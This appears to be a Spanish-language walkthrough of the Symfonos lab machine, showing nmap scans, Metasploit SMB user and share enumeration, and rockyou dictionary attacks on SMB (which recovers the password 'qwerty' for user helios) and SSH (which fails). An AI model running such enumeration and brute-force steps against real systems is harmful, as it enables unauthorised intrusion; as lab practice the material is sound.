Symfonos

Publicado: Jul 21, 2019

resumen en portada

em50l@jejo.es$

em50l@jejo.es$ nmap -sC -A 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-21 00:29 CEST
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

OS: Windows 6.1 (Samba 4.5.16-Debian)
Computer name: symfonos
account_used: guest
authentication_level: user

Busqueda carpetas http:

em50l@jejo.es$ nmap  192.168.56.101 -p 80 --script http-enum

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-21 00:23 CEST
Nmap scan report for 192.168.56.101
Host is up (0.00054s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|_  /manual/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds

Informacion Usuarios:

msf5 > use auxiliary/scanner/smb/smb_enumusers
(reverse-i-search)`': setg Interrupt: use the 'exit' command to quit
msf5 auxiliary(scanner/smb/smb_enumusers) > setg rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.56.101:139    - SYMFONOS [ helios ] ( LockoutTries=0 PasswordMin=5 )
[*] 192.168.56.101:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5> use auxiliary/scanner/smb/smb_lookupsid 
msf5 auxiliary(scanner/smb/smb_lookupsid) > run

[*] 192.168.56.101:139    - PIPE(LSARPC) LOCAL(SYMFONOS - 5-21-3173842667-3005291855-38846888) DOMAIN(WORKGROUP - )
[*] 192.168.56.101:139    - USER=nobody RID=501
[*] 192.168.56.101:445    - PIPE(LSARPC) LOCAL(SYMFONOS - 5-21-3173842667-3005291855-38846888) DOMAIN(WORKGROUP - )
[*] 192.168.56.101:445    - USER=nobody RID=501
[*] 192.168.56.101:445    - GROUP=None RID=513
[*] 192.168.56.101:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 > use auxiliary/scanner/smb/smb_enumshares 
msf5 auxiliary(scanner/smb/smb_enumshares) > run

[+] 192.168.56.101:139    - print$ - (DS) Printer Drivers
[+] 192.168.56.101:139    - helios - (DS) Helios personal share
[+] 192.168.56.101:139    - anonymous - (DS) 
[+] 192.168.56.101:139    - IPC$ - (I) IPC Service (Samba 4.5.16-Debian)
[*] 192.168.56.101:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Si navego a la URL smb://192.168.56.101/ veo lo mismo.

Un ataque de diccionario a smb????

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > show options 

Module options (auxiliary/scanner/smb/smb_login):
...
...
...
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/smb/smb_login) > set smbuser helios 
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.56.101:445    - 192.168.56.101:445 - Starting SMB login bruteforce
[-] 192.168.56.101:445    - 192.168.56.101:445 - Failed: '.\helios:123456',
[-] 192.168.56.101:445    - 192.168.56.101:445 - Failed: '.\helios:ashley',
...
...
[+] 192.168.56.101:445    - 192.168.56.101:445 - Success: '.\helios:qwerty'
^C[*] 192.168.56.101:445    - Caught interrupt from the console...
[*] Auxiliary module execution completed

Un ataque de diccionario a ssh???.

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):
…
…
…
msf5 auxiliary(scanner/ssh/ssh_login) > set username helios
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf5 auxiliary(scanner/ssh/ssh_login) > run
^C
[] Caught interrupt from the console…
[] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > set verbose yes
msf5 auxiliary(scanner/ssh/ssh_login) > run

[-] 192.168.56.101:22 - Failed: 'helios:123456'
[-] 192.168.56.101:22 - Failed: 'helios:12345'
[-] 192.168.56.101:22 - Failed: 'helios:123456789'
[-] 192.168.56.101:22 - Failed: 'helios:password'
[-] 192.168.56.101:22 - Failed: 'helios:iloveyou'
[-] …
[-] …
[-] …

Sin resultado..